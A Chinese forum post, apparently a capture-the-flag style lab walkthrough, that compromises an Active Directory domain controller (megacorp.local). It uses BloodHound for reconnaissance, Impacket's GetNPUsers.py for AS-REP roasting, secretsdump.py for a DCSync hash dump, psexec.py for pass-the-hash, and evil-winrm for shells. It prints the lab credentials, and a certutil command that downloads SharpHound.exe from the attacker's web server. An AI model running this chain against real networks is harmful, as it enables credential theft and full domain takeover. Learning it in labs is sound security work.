利用BloodHound与Impacket进行域渗透实战

zhaorong · 发表于 2021-7-1 16:55:44

域渗透对于初学者来说主要难点在于涉及域的基础理论知识较多比如ACL访问控制 DcSync
权限黄金票据白银票据 Access Token 哈希传递等等。
本文利用BloodHound来进行域信息的收集更重要的是通过该工具对域信息进行充分的挖掘与分析形成可行的
渗透思路遇到不懂的知识点，可以及时查阅相关资料极大的提高了我们学习域渗透的效率。

在有了渗透思路后我们利用Impacket工具包里的诸多域渗透相关工具进行实践即可。
本次域渗透背景为：通过前期web渗透获取了一个域控服务器用户的账号及密码
sandra:Password1234! 但该用户权限较低我们需要进一步渗透获取域控服务器管理员的权限。
为了保证渗透思路不被中断其中涉及到域的一些知识点这里只做普及性的介绍
就不展开进行详细论述了下面开始这次域渗透之旅。

端口扫描

根据开放的端口明显知道这是一个域控服务器我们在换个工具扫描一波端口防止端口漏扫。

masscan -p 1-65535 10.10.10.30 -e tun0 --rate=1000

与nmap结果对比新增了很多之前未发现的端口比如：5985 如何利用后面会讲这里即使没有
发现5985端口也不影响后续渗透的进行。

Impacket远程执行

既然已经有了一个用户的账号密码 sandra:Password1234! 想偷个懒看看能不能远程执行
就拿下域控服务器尝试一波Impacker的远程执行脚本。
Impacket的安装

Psexec.py：可提供完整的交互式控制台执行远程shell命令。

这里有个小技巧因为密码中有！所以要进行转意字符的处理；

wmiexec.py：可提供半交互式shell。

atexec.py：通过Task Scheduler服务在目标计算机上执行命令并返回已执行命令的输出。

上述几个脚本都可以直接获取shell 属于直接能拿下服务器的工具但这里不出意外都没有成功
那我们还是老老实实来分析域信息吧。

域信息收集

这里我们采用的是Neo4j+Bloodhound的组合来采集和分析域信息因此我们简单介绍下如何安装：

Neo4j的安装及启动

去Neo4j官网下载社区免费版：https://neo4j.com/download-center/#community

解压后启动初始账号和密码均为neo4j 浏览器里访问http://localhost:7474 登录即可；

Bloodhound的启动

直接下载 https://github.com/BloodHoundAD/BloodHound然后启动；

用上面Neo4j的账号密码登录数据库的地址用默认的就可以不需要更改；

域信息采集

Bloodhound自带有采集器的一是powershell采集器脚本SharpHound.ps1 二是可执行文件SharpHound.exe
但都需要登录到目标机器后运行这里我们采用一个可以远程采集域信息的工具
bloodhound.py 下载地址：https://github.com/fox-it/BloodHound.py。
安装命令：python3 setup.py install 安装完成后直接运行：

bloodhound-python -d megacorp.local -u sandra -p "Password
1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30

复制代码

得到4个文件 computers.json domains.json groups.json users.json 把生成的文件拖进Bloodhound；

加载完成后点击Analysis就可以开始分析域信息了。

域信息分析

在开始分析之前我们先简单了解下都可以分析出哪些结果；

我们实战中比较关注的点有：

Find all Domain Admins 查找所有域管理员
Find Shortest Paths to Domain Admins  查找域管理员的最短路径
Find Principals with DCSync Rights查找具有DCSync权限的主体
Users with Foreign Domain Group Membership 具有外域组成员身份的用户
Groups with Foreign Domain Group Membership  具有外域组成员身份的组
Map Domain Trusts 域信任映射图
Shortest Paths to Unconstrained Delegation Systems  不受约束的委派系统的最短路径
Shortest Paths from Kerberoastable Users 来自Kerberoastable用户的最短路径
Shortest Paths to Domain Admins from Kerberoastable Users可通过Kerberoastable用户访问域管理员的最短路径
Shortest Path from Owned Principals  已拥有权限最短路径
Shortest Paths to Domain Admins from Owned Principals 已拥有权限到域管理员的最短路径

补充
绿色用户头像：用户
三个黄色头像：用户组
红色小电脑：计算机
绿色小地球：域
本次渗透的目标是拿下域控管理员我们先依次分析下数据：
Shortest Paths to High Value Targets 高价值目标的最短路径

查找具有DCSync权限的主体；

通往高价值目标的最短路径；

我们可以看到用户svc_bes对域具有GenericAll特权这意味着该帐户可以从域控制器
请求复制数据并获得敏感信息如用户哈希等信息。

点开这个用户查看一下 Node Info。发现 ASREP Roastable 是 True

查询下相关资料 AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式其余2个用户均没有开启。

至此我们便有了一个渗透思路从用户svc_bes开始入手。

域渗透

GetNPUsers.py

GetNPUsers.py是Impacket工具包中的一个脚本该脚本实现了将尝试为那些设置了属性不需要Kerberos预身份验证
的用户获取TGT输出。TGT hash 包含用户密码获取到之后直接用JTR或者hashcat破解即可。

GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30

由此获得了用户svc_bes的密码为Sheffield19 后续我们可以使用Impacket的secretsdump.py
来执行DCSync攻击并转储所有域用户的NTLM哈希值。

secretsdump.py

secretsdump.py是Impacket工具包中的一个脚本该脚本实现了多种不需要在远程主机
上执行任何代理的情况下转储机密数据的技术。

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30

至此得到了域管理员的NTLM哈希我们可以在PTH攻击中使用它来获得对系统的更高访问权限
因此我们可以使用Impacket的psexec.py来实现提权。

提权

psexec.py

psexec.py是Impacket工具包中的一个脚本该脚本实现了在远程Windows系统上执行进程复制文件并返
回处理输出结果此外它还允许直接使用完整的交互式控制台执行远程shell命令。

语法：

psexec.py megacorp.local/administrator@10.10.10.30 -hashes <NTML hash>:<NTLM hash>

总结

看下整个渗透过程的流程图方便于理清渗透思路；

彩蛋

之前发现5985端口是开放的可以利用工具evil-winrm直接进行连接。

evil-winrm
evil-winrm是Windows远程管理(WinRM) Shell的终极版本。此程序可在启用此功能的任何Microsoft Windows
服务器上使用通常端口为5985 当然只有在你具有使用凭据和权限时才能使用。
安装：gem install evil-winrm
最初的用户sandra可以直连后获得shell的只不过权限太低所以要想办法切换到其他用户；

后续的用户svc_bes也可以用该工具直连获取shell；

管理员Administrator也可以直连获取shell；

运用Bloodhound自带采集器

当连接上后就可以运行Bloodhound自带的采集器了；

先在kali上搭建一个web服务；

远程下载后运行；

certutil.exe -urlcache -split -f "http://10.10.16.66:8000/Sh
arpHound.exe" SharpHound.exe

程序运行后成功；

换成powershell脚本试试；

运行脚本；

成功采集到信息下载下来看看；

导入BloodHound就可以分析了。

		自动登录	找回密码
密码			注册

[WEB前端技术] 利用BloodHound与Impacket进行域渗透实战